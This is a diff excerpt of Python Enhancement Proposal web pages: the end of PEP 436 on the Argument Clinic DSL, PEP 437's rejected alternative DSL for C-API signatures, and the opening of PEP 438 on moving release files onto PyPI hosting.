The “converter” is the name of one of the “converter functions” registered +with Argument Clinic. Clinic will ship with a number of built-in converters; +new converters can also be added dynamically. In choosing a converter, you +are automatically constraining what Python types are permitted on the input, +and specifying what type the output variable (or variables) will be. Although +many of the converters will resemble the names of C types or perhaps Python +types, the name of a converter may be any legal Python identifier.

+

If the converter is followed by parentheses, these parentheses enclose +parameter to the conversion function. The syntax mirrors providing arguments +a Python function call: the parameter must always be named, as if they were +“keyword-only parameters”, and the values provided for the parameters will +syntactically resemble Python literal values. These parameters are always +optional, permitting all conversion functions to be called without +any parameters. In this case, you may also omit the parentheses entirely; +this is always equivalent to specifying empty parentheses. The values +supplied for these parameters must be compatible with ast.literal_eval.

+

The “default” is a Python literal value. Default values are optional; +if not specified you must omit the equals sign too. Parameters which +don’t have a default are implicitly required. The default value is +dynamically assigned, “live” in the generated C code, and although +it’s specified as a Python value, it’s translated into a native C +value in the generated C code. Few default values are permitted, +owing to this manual translation step.

+

If this were a Python function declaration, a parameter declaration +would be delimited by either a trailing comma or an ending parenthesis. +However, Argument Clinic uses neither; parameter declarations are +delimited by a newline. A trailing comma or right parenthesis is not +permitted.

+

The first parameter declaration establishes the indent for all parameter +declarations in a particular Clinic code block. All subsequent parameters +must be indented to the same level.

+
+
+

Legacy Converters

+

For convenience’s sake in converting existing code to Argument Clinic, +Clinic provides a set of legacy converters that match PyArg_ParseTuple +format units. They are specified as a C string containing the format +unit. For example, to specify a parameter “foo” as taking a Python +“int” and emitting a C int, you could specify:

+
foo : "i"
+
+
+

(To more closely resemble a C string, these must always use double quotes.)

+

Although these resemble PyArg_ParseTuple format units, no guarantee is +made that the implementation will call a PyArg_Parse function for parsing.

+

This syntax does not support parameters. Therefore, it doesn’t support any +of the format units that require input parameters ("O!", "O&", "es", "es#", +"et", "et#"). Parameters requiring one of these conversions cannot use the +legacy syntax. (You may still, however, supply a default value.)

+
+
+

Parameter Docstrings

+

All lines that appear below and are indented further than a parameter declaration +are the docstring for that parameter. All such lines are “dedented” until the +first line is flush left.

+
+
+

Special Syntax For Parameter Lines

+

There are four special symbols that may be used in the parameter section. Each +of these must appear on a line by itself, indented to the same level as parameter +declarations. The four symbols are:

+
+
*
Establishes that all subsequent parameters are keyword-only.
+
[
Establishes the start of an optional “group” of parameters. +Note that “groups” may nest inside other “groups”. +See Functions With Positional-Only Parameters below. +Note that currently [ is only legal for use in functions +where all parameters are marked positional-only, see +/ below.
+
]
Ends an optional “group” of parameters.
+
/
Establishes that all the proceeding arguments are +positional-only. For now, Argument Clinic does not +support functions with both positional-only and +non-positional-only arguments. Therefore: if / +is specified for a function, it must currently always +be after the last parameter. Also, Argument Clinic +does not currently support default values for +positional-only parameters.
+
+

(The semantics of / follow a syntax for positional-only +parameters in Python once proposed by Guido. [5] )

+
+
+

Function Docstring

+

The first line with no leading whitespace after the function declaration is the +first line of the function docstring. All subsequent lines of the Clinic block +are considered part of the docstring, and their leading whitespace is preserved.

+

If the string {parameters} appears on a line by itself inside the function +docstring, Argument Clinic will insert a list of all parameters that have +docstrings, each such parameter followed by its docstring. The name of the +parameter is on a line by itself; the docstring starts on a subsequent line, +and all lines of the docstring are indented by two spaces. (Parameters with +no per-parameter docstring are suppressed.) The entire list is indented by the +leading whitespace that appeared before the {parameters} token.

+

If the string {parameters} doesn’t appear in the docstring, Argument Clinic +will append one to the end of the docstring, inserting a blank line above it if +the docstring does not end with a blank line, and with the parameter list at +column 0.

+
+
+

Converters

+

Argument Clinic contains a pre-initialized registry of converter functions. +Example converter functions:

+
+
int
Accepts a Python object implementing __int__; emits a C int.
+
byte
Accepts a Python int; emits an unsigned char. The integer +must be in the range [0, 256).
+
str
Accepts a Python str object; emits a C char *. Automatically +encodes the string using the ascii codec.
+
PyObject
Accepts any object; emits a C PyObject * without any conversion.
+
+

All converters accept the following parameters:

+
+
doc_default
The Python value to use in place of the parameter’s actual default +in Python contexts. In other words: when specified, this value will +be used for the parameter’s default in the docstring, and in the +Signature. (TBD alternative semantics: If the string is a valid +Python expression which can be rendered into a Python value using +eval(), then the result of eval() on it will be used as the +default in the Signature.) Ignored if there is no default.
+
required
Normally any parameter that has a default value is automatically +optional. A parameter that has “required” set will be considered +required (non-optional) even if it has a default value. The +generated documentation will also not show any default value.
+
+

Additionally, converters may accept one or more of these optional +parameters, on an individual basis:

+
+
annotation
Explicitly specifies the per-parameter annotation for this +parameter. Normally it’s the responsibility of the conversion +function to generate the annotation (if any).
+
bitwise
For converters that accept unsigned integers. If the Python integer +passed in is signed, copy the bits directly even if it is negative.
+
encoding
For converters that accept str. Encoding to use when encoding a +Unicode string to a char *.
+
immutable
Only accept immutable values.
+
length
For converters that accept iterable types. Requests that the converter +also emit the length of the iterable, passed in to the _impl function +in a Py_ssize_t variable; its name will be this +parameter’s name appended with “_length”.
+
nullable
This converter normally does not accept None, but in this case +it should. If None is supplied on the Python side, the equivalent +C argument will be NULL. (The _impl argument emitted by this +converter will presumably be a pointer type.)
+
types
A list of strings representing acceptable Python types for this object. +There are also four strings which represent Python protocols:
    +
  • “buffer”
  • +
  • “mapping”
  • +
  • “number”
  • +
  • “sequence”
  • +
+
+
zeroes
For converters that accept string types. The converted value should +be allowed to have embedded zeroes.
+
+
+
+

Return Converters

+

A return converter conceptually performs the inverse operation of +a converter: it converts a native C value into its equivalent Python +value.

+
+
+

Directives

+

Argument Clinic also permits “directives” in Clinic code blocks. +Directives are similar to pragmas in C; they are statements +that modify Argument Clinic’s behavior.

+

The format of a directive is as follows:

+
directive_name [argument [second_argument [ ... ]]]
+
+
+

Directives only take positional arguments.

+

A Clinic code block must contain either one or more directives, +or a function declaration. It may contain both, in which +case all directives must come before the function declaration.

+

Internally directives map directly to Python callables. +The directive’s arguments are passed directly to the callable +as positional arguments of type str().

+

Example possible directives include the production, +suppression, or redirection of Clinic output. Also, the +“module” and “class” keywords are implemented +as directives in the prototype.

+
+
+
+

Python Code

+

Argument Clinic also permits embedding Python code inside C files, +which is executed in-place when Argument Clinic processes the file. +Embedded code looks like this:

+
/*[python]
+
+# this is python code!
+print("/" + "* Hello world! *" + "/")
+
+[python]*/
+/* Hello world! */
+/*[python end:da39a3ee5e6b4b0d3255bfef95601890afd80709]*/
+
+
+

The "/* Hello world! */" line above was generated by running the Python +code in the preceding comment.

+

Any Python code is valid. Python code sections in Argument Clinic can +also be used to directly interact with Clinic; see +Argument Clinic Programmatic Interfaces.

+
+
+

Output

+

Argument Clinic writes its output inline in the C file, immediately +after the section of Clinic code. For “python” sections, the output +is everything printed using builtins.print. For “clinic” +sections, the output is valid C code, including:

+
    +
  • a #define providing the correct methoddef structure for the +function
  • +
  • a prototype for the “impl” function – this is what you’ll write +to implement this function
  • +
  • a function that handles all argument processing, which calls your +“impl” function
  • +
  • the definition line of the “impl” function
  • +
  • and a comment indicating the end of output.
  • +
+

The intention is that you write the body of your impl function immediately +after the output – as in, you write a left-curly-brace immediately after +the end-of-output comment and implement builtin in the body there. +(It’s a bit strange at first, but oddly convenient.)

+

Argument Clinic will define the parameters of the impl function for +you. The function will take the “self” parameter passed in +originally, all the parameters you define, and possibly some extra +generated parameters (“length” parameters; also “group” parameters, +see next section).

+

Argument Clinic also writes a checksum for the output section. This +is a valuable safety feature: if you modify the output by hand, Clinic +will notice that the checksum doesn’t match, and will refuse to +overwrite the file. (You can force Clinic to overwrite with the +“-f” command-line argument; Clinic will also ignore the checksums +when using the “-o” command-line argument.)

+

Finally, Argument Clinic can also emit the boilerplate definition +of the PyMethodDef array for the defined classes and modules.

+
+
+

Functions With Positional-Only Parameters

+

A significant fraction of Python builtins implemented in C use the +older positional-only API for processing arguments +(PyArg_ParseTuple()). In some instances, these builtins parse +their arguments differently based on how many arguments were passed +in. This can provide some bewildering flexibility: there may be +groups of optional parameters, which must either all be specified or +none specified. And occasionally these groups are on the left! (A +representative example: curses.window.addch().)

+

Argument Clinic supports these legacy use-cases by allowing you to +specify parameters in groups. Each optional group of parameters +is marked with square brackets. Note that these groups are permitted +on the right or left of any required parameters!

+

The impl function generated by Clinic will add an extra parameter for +every group, “int group_{left|right}_<x>”, where x is a monotonically +increasing number assigned to each group as it builds away from the +required arguments. This argument will be nonzero if the group was +specified on this call, and zero if it was not.

+

Note that when operating in this mode, you cannot specify default +arguments.

+

Also, note that it’s possible to specify a set of groups to a function +such that there are several valid mappings from the number of +arguments to a valid set of groups. If this happens, Clinic will abort +with an error message. This should not be a problem, as +positional-only operation is only intended for legacy use cases, and +all the legacy functions using this quirky behavior have unambiguous +mappings.

+
+
+

Current Status

+

As of this writing, there is a working prototype implementation of +Argument Clinic available online (though the syntax may be out of date +as you read this). [6] The prototype generates code using the +existing PyArg_Parse APIs. It supports translating to all current +format units except the mysterious "w*". Sample functions using +Argument Clinic exercise all major features, including positional-only +argument parsing.

+
+

Argument Clinic Programmatic Interfaces

+

The prototype also currently provides an experimental extension +mechanism, allowing adding support for new types on-the-fly. See +Modules/posixmodule.c in the prototype for an example of its use.

+

In the future, Argument Clinic is expected to be automatable enough +to allow querying, modification, or outright new construction of +function declarations through Python code. It may even permit +dynamically adding your own custom DSL!

+
+
+
+

Notes / TBD

+
    +
  • The API for supplying inspect.Signature metadata for builtins is +currently under discussion. Argument Clinic will add support for +the prototype when it becomes viable.
  • +
  • Alyssa Coghlan suggests that we a) only support at most one left-optional +group per function, and b) in the face of ambiguity, prefer the left +group over the right group. This would solve all our existing use cases +including range().
  • +
  • Optimally we’d want Argument Clinic run automatically as part of the +normal Python build process. But this presents a bootstrapping problem; +if you don’t have a system Python 3, you need a Python 3 executable to +build Python 3. I’m sure this is a solvable problem, but I don’t know +what the best solution might be. (Supporting this will also require +a parallel solution for Windows.)
  • +
  • On a related note: inspect.Signature has no way of representing +blocks of arguments, like the left-optional block of y and x +for curses.window.addch. How far are we going to go in supporting +this admittedly aberrant parameter paradigm?
  • +
  • During the PyCon US 2013 Language Summit, there was discussion of having +Argument Clinic also generate the actual documentation (in ReST, processed +by Sphinx) for the function. The logistics of this are TBD, but it would +require that the docstrings be written in ReST, and require that Python +ship a ReST -> ascii converter. It would be best to come to a decision +about this before we begin any large-scale conversion of the CPython +source tree to using Clinic.
  • +
  • Guido proposed having the “function docstring” be hand-written inline, +in the middle of the output, something like this:
    /*[clinic]
    +  ... prototype and parameters (including parameter docstrings) go here
    +[clinic]*/
    +... some output ...
    +/*[clinic docstring start]*/
    +... hand-edited function docstring goes here   <-- you edit this by hand!
    +/*[clinic docstring end]*/
    +... more output
    +/*[clinic output end]*/
    +
    +
    +

    I tried it this way and don’t like it – I think it’s clumsy. I +prefer that everything you write goes in one place, rather than +having an island of hand-edited stuff in the middle of the DSL +output.

    +
  • +
  • Argument Clinic does not support automatic tuple unpacking +(the “(OOO)” style format string for PyArg_ParseTuple().)
  • +
  • Argument Clinic removes some dynamism / flexibility. With +PyArg_ParseTuple() one could theoretically pass in different +encodings at runtime for the “es”/”et” format units. +AFAICT CPython doesn’t do this itself, however it’s possible +external users might do this. (Trivia: there are no uses of +“es” exercised by regrtest, and all the uses of “et” +exercised are in socketmodule.c, except for one in _ssl.c. +They’re all static, specifying the encoding "idna".)
  • +
+
+
+

Acknowledgements

+

The PEP author wishes to thank Ned Batchelder for permission to +shamelessly rip off his clever design for Cog–“my favorite tool +that I’ve never gotten to use”. Thanks also to everyone who provided +feedback on the [bugtracker issue] and on python-dev. Special thanks +to Alyssa (Nick) Coghlan and Guido van Rossum for a rousing two-hour in-person +deep dive on the topic at PyCon US 2013.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0436.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0437/index.html b/pep-0437/index.html new file mode 100644 index 00000000000..00687528e3d --- /dev/null +++ b/pep-0437/index.html @@ -0,0 +1,491 @@ + + + + + + + + PEP 437 – A DSL for specifying signatures, annotations and argument converters | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 437 – A DSL for specifying signatures, annotations and argument converters

+
+
Author:
+
Stefan Krah <skrah at bytereef.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2013
+
Python-Version:
+
3.4
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Python C-API currently has no mechanism for specifying and auto-generating +function signatures, annotations or custom argument converters.

+

There are several possible approaches to the problem. Cython uses cdef +definitions in .pyx files to generate the required information. However, +CPython’s C-API functions often require additional initialization and +cleanup snippets that would be hard to specify in a cdef.

+

PEP 436 proposes a domain specific language (DSL) enclosed in C comments +that largely resembles a per-parameter configuration file. A preprocessor +reads the comment and emits an argument parsing function, docstrings and +a header for the function that utilizes the results of the parsing step.

+

The latter function is subsequently referred to as the implementation +function.

+
+
+

Rejection Notice

+

This PEP was rejected by Guido van Rossum at PyCon US 2013. However, several +of the specific issues raised by this PEP were taken into account when +designing the second iteration of the PEP 436 DSL.

+
+
+

Rationale

+

Opinions differ regarding the suitability of the PEP 436 DSL in the context +of a C file. This PEP proposes an alternative DSL. The specific issues with +PEP 436 that spurred the counter proposal will be explained in the final +section of this PEP.

+
+
+

Scope

+

The PEP focuses exclusively on the DSL. Topics like the output locations of +docstrings or the generated code are outside the scope of this PEP.

+

It is however vital that the DSL is suitable for generating custom argument +parsers, a feature that is already implemented in Cython. Therefore, one of +the goals of this PEP is to keep the DSL close to existing solutions, thus +facilitating a possible inclusion of the relevant parts of Cython into the +CPython source tree.

+
+
+

DSL overview

+
+

Type safety and annotations

+

A conversion from a Python to a C value is fully defined by the type of +the converter function. The PyArg_Parse* family of functions accepts +custom converters in addition to the well-known default converters “i”, +“f”, etc.

+

This PEP views the default converters as abstract functions, regardless +of how they are actually implemented.

+
+
+

Include/converters.h

+

Converter functions must be forward-declared. All converter functions +shall be entered into the file Include/converters.h. The file is read +by the preprocessor prior to translating .c files. This is an excerpt:

+
/*[converter]
+##### Default converters #####
+"s":  str                                -> const char *res;
+"s*": [str, bytes, bytearray, rw_buffer] -> Py_buffer &res;
+[...]
+"es#": str -> (const char *res_encoding, char **res, Py_ssize_t *res_length);
+[...]
+##### Custom converters #####
+path_converter:           [str, bytes, int]  -> path_t &res;
+OS_STAT_DIR_FD_CONVERTER: [int, None]        -> int res;
+[converter_end]*/
+
+
+

Converters are specified by their name, Python input type(s) and C output +type(s). Default converters must have quoted names, custom converters must +have regular names. A Python type is given by its name. If a function accepts +multiple Python types, the set is written in list form.

+

Since the default converters may have multiple implicit return values, +the C output type(s) are written according to the following convention:

+

The main return value must be named res. This is a placeholder for +the actual variable name given later in the DSL. Additional implicit +return values must be prefixed by res_.

+

By default the variables are passed by value to the implementation function. +If the address should be passed instead, res must be prefixed with an +ampersand.

+

Additional declarations may be placed into .c files. Duplicate declarations +are allowed as long as the function types are identical.

+

It is encouraged to declare custom converter types a second time right +above the converter function definition. The preprocessor will then catch +any mismatch between the declarations.

+

In order to keep the converter complexity manageable, PY_SSIZE_T_CLEAN will +be deprecated and Py_ssize_t will be assumed for all length arguments.

+

TBD: Make a list of fantasy types like rw_buffer.

+
+
+

Function specifications

+
+

Keyword arguments

+

This example contains the definition of os.stat. The individual sections will +be explained in detail. Grammatically, the whole define block consists of a +function specification and an output section. The function specification in +turn consists of a declaration section, an optional C-declaration section and +an optional cleanup code section. Sections within the function specification +are separated in yacc style by ‘%%’:

+
/*[define posix_stat]
+def os.stat(path: path_converter, *, dir_fd: OS_STAT_DIR_FD_CONVERTER = None,
+            follow_symlinks: "p" = True) -> os.stat_result: pass
+%%
+path_t path = PATH_T_INITIALIZE("stat", 0, 1);
+int dir_fd = DEFAULT_DIR_FD;
+int follow_symlinks = 1;
+%%
+path_cleanup(&path);
+[define_end]*/
+
+<literal C output>
+
+/*[define_output_end]*/
+
+
+
+
Define block
+

The function specification block starts with a /*[define token, followed +by an optional C function name, followed by a right bracket. If the C function +name is not given, it is generated from the declaration name. In the example, +omitting the name posix_stat would result in a C function name of os_stat.

+
+
+
Declaration
+

The required declaration is (almost) a valid Python function definition. The +‘def’ keyword and the function body are redundant, but the author of this PEP +finds the definition more readable if they are present.

+

The function name may be a path instead of a plain identifier. Each argument +is annotated with the name of the converter function that will be applied to it.

+

Default values are given in the usual Python manner and may be any valid +Python expression.

+

The return value may be any Python expression. Usually it will be the name +of an object, but alternative return values could be specified in list form.

+
+
+
C-declarations
+

This optional section contains C variable declarations. Since the converter +functions have been declared beforehand, the preprocessor can type-check +the declarations.

+
+
+
Cleanup
+

The optional cleanup section contains literal C code that will be inserted +unmodified after the implementation function.

+
+
+
Output
+

The output section contains the code emitted by the preprocessor.

+
+
+
+

Positional-only arguments

+

Functions that do not take keyword arguments are indicated by the presence +of the slash special parameter:

+
/*[define stat_float_times]
+def os.stat_float_times(/, newval: "i") -> os.stat_result: pass
+%%
+int newval = -1;
+[define_end]*/
+
+
+

The preprocessor translates this definition to a PyArg_ParseTuple() call. +All arguments to the right of the slash are optional arguments.

+
+
+

Left and right optional arguments

+

Some legacy functions contain optional arguments groups both to the left and +right of a central parameter. It is debatable whether a new tool should support +such functions. For completeness’ sake, this is the proposed syntax:

+
/*[define]
+def curses.window.addch(y: "i", x: "i", ch: "O", attr: "l") -> None: pass
+where groups = [[ch], [ch, attr], [y, x, ch], [y, x, ch, attr]]
+[define_end]*/
+
+
+

Here ch is the central parameter, attr can optionally be added on the +right, and the group [y, x] can optionally be added on the left.

+

Essentially the rule is that all ordered combinations of the central +parameter and the optional groups must be possible such that no two +combinations have the same length.

+

This is concisely expressed by putting the central parameter first in +the list and subsequently adding the optional arguments groups to the +left and right.

+
+
+
+
+

Flexibility in formatting

+

If the above os.stat example is considered too compact, it can easily be +formatted this way:

+
/*[define posix_stat]
+def os.stat(path: path_converter,
+            *,
+            dir_fd: OS_STAT_DIR_FD_CONVERTER = None,
+            follow_symlinks: "p" = True)
+-> os.stat_result: pass
+%%
+path_t path = PATH_T_INITIALIZE("stat", 0, 1);
+int dir_fd = DEFAULT_DIR_FD;
+int follow_symlinks = 1;
+%%
+path_cleanup(&path);
+[define_end]*/
+
+<literal C output>
+
+/*[define_output_end]*/
+
+
+
+
+

Benefits of a compact notation

+

The advantages of a concise notation are especially obvious when a large +number of parameters is involved. The argument parsing part of +_posixsubprocess.fork_exec is fully specified by this definition:

+
/*[define subprocess_fork_exec]
+def _posixsubprocess.fork_exec(
+    process_args: "O", executable_list: "O",
+    close_fds: "p", py_fds_to_keep: "O",
+    cwd_obj: "O", env_list: "O",
+    p2cread: "i", p2cwrite: "i", c2pread: "i", c2pwrite: "i",
+    errread: "i", errwrite: "i", errpipe_read: "i", errpipe_write: "i",
+    restore_signals: "i", call_setsid: "i", preexec_fn: "i", /) -> int: pass
+[define_end]*/
+
+
+

Note that the preprocess tool currently emits a redundant C-declaration +section for this example, so the output is longer than necessary.

+
+
+

Easy validation of the definition

+

How can an inexperienced user validate a definition like os.stat? Simply +by changing os.stat to os_stat, defining missing converters and pasting +the definition into the Python interactive interpreter!

+

In fact, a converters.py module could be auto-generated from converters.h.

+
+
+

Reference implementation

+

A reference implementation is available at issue 16612. Since this PEP +was written under time constraints and the author is unfamiliar with the +PLY toolchain, the software is written in Standard ML and utilizes the +ml-yacc/ml-lex toolchain.

+

The grammar is conflict-free and available in ml-yacc readable BNF form.

+

Two tools are available:

+
    +
  • printsemant reads a converter header and a .c file and dumps +the semantically checked parse tree to stdout.
  • +
  • preprocess reads a converter header and a .c file and dumps +the preprocessed .c file to stdout.
  • +
+

Known deficiencies:

+
    +
  • The Python ‘test’ expression is not semantically checked. The syntax +however is checked since it is part of the grammar.
  • +
  • The lexer does not handle triple quoted strings.
  • +
  • C declarations are parsed in a primitive way. The final implementation +should utilize ‘declarator’ and ‘init-declarator’ from the C grammar.
  • +
  • The preprocess tool does not emit code for the left-and-right optional +arguments case. The printsemant tool can deal with this case.
  • +
  • Since the preprocess tool generates the output from the parse +tree, the original indentation of the define block is lost.
  • +
+
+
+

Grammar

+
+
TBD: The grammar exists in ml-yacc readable form, but should probably be +included here in EBNF notation.
+
+
+

Comparison with PEP 436

+

The author of this PEP has the following concerns about the DSL proposed +in PEP 436:

+
    +
  • The whitespace sensitive configuration file like syntax looks out +of place in a C file.
  • +
  • The structure of the function definition gets lost in the per-parameter +specifications. Keywords like positional-only, required and keyword-only +are scattered across too many different places.

    By contrast, in the alternative DSL the structure of the function +definition can be understood at a single glance.

    +
  • +
  • The PEP 436 DSL has 14 documented flags and at least one undocumented +(allow_fd) flag. Figuring out which of the 2**15 possible combinations +are valid places an unnecessary burden on the user.

    Experience with the PEP 3118 buffer flags has shown that sorting out +(and exhaustively testing!) valid combinations is an extremely tedious +task. The PEP 3118 flags are still not well understood by many people.

    +

    By contrast, the alternative DSL has a central file Include/converters.h +that can be quickly searched for the desired converter. Many of the +converters are already known, perhaps even memorized by people (due +to frequent use).

    +
  • +
  • The PEP 436 DSL allows too much freedom. Types can apparently be omitted, +the preprocessor accepts (and ignores) unknown keywords, sometimes adding +white space after a docstring results in an assertion error.

    The alternative DSL on the other hand allows no such freedoms. Omitting +converter or return value annotations is plainly a syntax error. The +LALR(1) grammar is unambiguous and specified for the complete translation +unit.

    +
  • +
+
+ +
+

References and Footnotes

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0437.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0438/index.html b/pep-0438/index.html new file mode 100644 index 00000000000..d010951efdb --- /dev/null +++ b/pep-0438/index.html @@ -0,0 +1,577 @@ + + + + + + + + PEP 438 – Transitioning to release-file hosting on PyPI | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 438 – Transitioning to release-file hosting on PyPI

+
+
Author:
+
Holger Krekel <holger at merlinux.eu>, Carl Meyer <carl at oddbird.net>
+
BDFL-Delegate:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
15-Mar-2013
+
Post-History:
+
19-May-2013
+
Superseded-By:
+
470
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a backward-compatible two-phase transition process +to speed up, simplify and robustify installing from the +pypi.python.org (PyPI) package index. To ease the transition and +minimize client-side friction, no changes to distutils or existing +installation tools are required in order to benefit from the first +transition phase, which will result in faster, more reliable installs +for most existing packages.

+

The first transition phase implements easy and explicit means for a +package maintainer to control which release file links are served to +present-day installation tools. The first phase also includes the +implementation of analysis tools for present-day packages, to support +communication with package maintainers and the automated setting of +default modes for controlling release file links. The first phase +also will default newly-registered projects on PyPI to only serve +links to release files which were uploaded to PyPI.

+

The second transition phase concerns end-user installation tools, +which shall default to only install release files that are hosted on +PyPI and tell the user if external release files exist, offering a +choice to automatically use those external files. External release +files shall in the future be registered together with a checksum +hash so that installation tools can verify the integrity of the +eventual download (PyPI-hosted release files always carry such +a checksum).

+

Alternative PyPI server implementations should implement the new +simple index serving behaviour of transition phase 1 to avoid +installation tools treating their release links as external ones in +phase 2.

+
+
+

Rationale

+
+

History and motivations for external hosting

+

When PyPI went online, it offered release registration but had no +facility to host release files itself. When hosting was added, no +automated downloading tool existed yet. When Phillip Eby implemented +automated downloading (through setuptools), he made the choice to +allow people to use download hosts of their choice. The finding of +externally-hosted packages was implemented as follows:

+
    +
  1. The PyPI simple/ index for a package contains all links found +by scraping them from that package’s long_description metadata for +any release. Links in the “Download-URL” and “Home-page” metadata +fields are given rel=download and rel=homepage attributes, +respectively.
  2. +
  3. Any of these links whose target is a file whose name appears to be +in the form of an installable source or binary distribution, with +name in the form “packagename-version.ARCHIVEEXT”, is considered a +potential installation candidate by installation tools.
  4. +
  5. Similarly, any links suffixed with an “#egg=packagename-version” +fragment are considered an installation candidate.
  6. +
  7. Additionally, the rel=homepage and rel=download links are +crawled by installation tools and, if HTML, are themselves scraped +for release-file links in the above formats.
  8. +
+

See the easy_install documentation for a complete description of this +behavior. [1]

+

Today, most packages indexed on PyPI host their release files on +PyPI. Out of 29,117 total projects on PyPI, only 2,581 (less than 10%) +include any links to installable files that are available only +off-PyPI. [2]

+

There are many reasons [3] why people have chosen external +hosting. To cite just a few:

+
    +
  • release processes and scripts have been developed already and upload +to external sites
  • +
  • it takes too long to upload large files from some places in the +world
  • +
  • export restrictions e.g. for crypto-related software
  • +
  • company policies which require offering open source packages through +own sites
  • +
  • problems with integrating uploading to PyPI into one’s release +process (because of release policies)
  • +
  • desiring download statistics different from those maintained by PyPI
  • +
  • perceived bad reliability of PyPI
  • +
  • not aware that PyPI offers file-hosting
  • +
+

Irrespective of the present-day validity of these reasons, there +clearly is a history why people choose to host files externally and it +even was for some time the only way you could do things. This PEP +takes the position that there remain some valid reasons for +external hosting even today.

+
+
+

Problem

+

Today, python package installers (pip, easy_install, buildout, and +others) often need to query many non-PyPI URLs even if there are no +externally hosted files. Apart from querying pypi.python.org’s +simple index pages, also all homepages and download pages ever +specified with any release of a package are crawled by an installer. +The need for installers to crawl external sites slows down +installation and makes for a brittle and unreliable installation +process. Those sites and packages also don’t take part in the +PEP 381 mirroring infrastructure, further decreasing reliability +and speed of automated installation processes around the world.

+

Most packages are hosted directly on pypi.python.org [2]. Even for +these packages, installers still crawl their homepage and +download-url, if specified. Many package uploaders are not aware that +specifying the “homepage” or “download-url” in their package metadata +will needlessly slow down the installation process for all users.

+

Relying on third party sites also opens up more attack vectors for +injecting malicious packages into sites using automated installs. A +simple attack might just involve getting hold of an old now-unused +homepage domain and placing malicious packages there. Moreover, +performing a Man-in-The-Middle (MITM) attack between an installation +site and any of the download sites can inject malicious packages on +the installation site. As many homepages and download locations are +using HTTP and not HTTPS, such attacks are not hard to launch. Such +MITM attacks can easily happen even for packages which never intended +to host files externally as their homepages are contacted by +installers anyway.

+

There is currently no way for package maintainers to avoid +external-link crawling, other than removing all homepage/download url +metadata for all historic releases. While a script [4] has been +written to perform this action, it is not a good general solution +because it removes useful metadata from PyPI releases.

+

Even if the sites referenced by “Homepage” and “Download-URL” links +were not scraped for further links, there is no obvious way under the +current system for a package owner to link to an installable file from +a long_description metadata field (which is shown as package +documentation on /pypi/PKG) without installation tools +automatically considering that file a candidate for installation. +Conversely, there is no way to explicitly register multiple external +release files without putting them in metadata fields.

+
+
+

Goals

+

These are the goals to be achieved by implementation of this PEP:

+
    +
  • Package owners should be able to explicitly control which files are +presented by PyPI to installer tools as installation +candidates. Installation should not be slowed and made less reliable +by extensive and unnecessary crawling of links that package owners +did not explicitly nominate as installation files.
  • +
  • It should remain possible for package owners to choose to host their +release files on their own hosting, external to PyPI. It should be +easy for a user to request the installation of such releases using +automated installer tools, especially if the external release files +were registered together with a checksum hash.
  • +
  • Automated installer tools should not install externally-hosted +packages by default, but require explicit authorization to do so +by the user. When tools refuse to install such a package by default, +they should tell the user exactly which external link(s) the +installer needs to follow, and what option(s) the user can provide +to authorize the tool to follow those links. PyPI should provide all +necessary metadata for installer tools to implement this easily and +within a single request/reply interaction.
  • +
  • Migration from the status quo to the above points should be gradual +and minimize breakage. This includes tooling that makes it easy for +package owners with an existing release process that uploads to +non-PyPI hosting to also upload those release files to PyPI.
  • +
+
+
+
+

Solution / two transition phases

+

The first transition phase introduces a “hosting-mode” field for each +project on PyPI, allowing package owners explicit control of which +release file links are served to present-day installation tools in the +machine-readable simple/ index. The first transition will, after +successful hosting-mode manipulations by individual early-adopters, +set a default hosting mode for existing packages, based on automated +analysis. Maintainers will be notified one month ahead of any such +automated change. At completion of the first transition phase, +all present-day existing release and installation processes and +tools are expected to continue working. Any remaining errors or +problems are expected to only relate to installation of individual +packages and can be easily corrected by package maintainers or PyPI +admins if maintainers are not reachable.

+

Also in the first phase, each link served in the simple/ index +will be explicitly marked as rel="internal" if it is hosted by the +index itself (even if on a separate domain, which may be the case if +the index uses a CDN for file-serving). Any link not so marked will be +considered an external link.

+

In the second transition phase, PyPI client installation tools shall +be updated to default to only install rel="internal" packages +unless a user specifies option(s) to permit installing from external +links. See second transition phase for details on how installers +should behave.

+

Maintainers of packages which currently host release files on non-PyPI +sites shall receive instructions and tools to ease “re-hosting” of +their historic and future package release files. This re-hosting tool +MUST be available before automated hosting-mode changes are announced +to package maintainers.

+
+
+

Implementation

+
+

Hosting modes

+

The foundation of the first transition phase is the introduction of +three “modes” of PyPI hosting for a package, affecting which links are +generated for the simple/ index. These modes are implemented +without requiring changes to installation tools via changes to the +algorithm for generating the machine-readable simple/ index.

+

The modes are:

+
    +
  • pypi-scrape-crawl: no change from the current situation of +generating machine-readable links for installation tools, as +outlined in the history.
  • +
  • pypi-scrape: for a package in this mode, links to be added to +the simple/ index are still scraped from package +metadata. However, the “Home-page” and “Download-url” links are +given rel=ext-homepage and rel=ext-download attributes +instead of rel=homepage and rel=download. The effect of this +(with no change in installation tools necessary) is that these links +will not be followed and scraped for further candidate links by +present-day installation tools: only installable files directly +hosted from PyPI or linked directly from PyPI metadata will be +considered for installation. Installation tools MAY evolve to offer +an option to use the new rel-attribution to crawl external pages but +MUST NOT default to it.
  • +
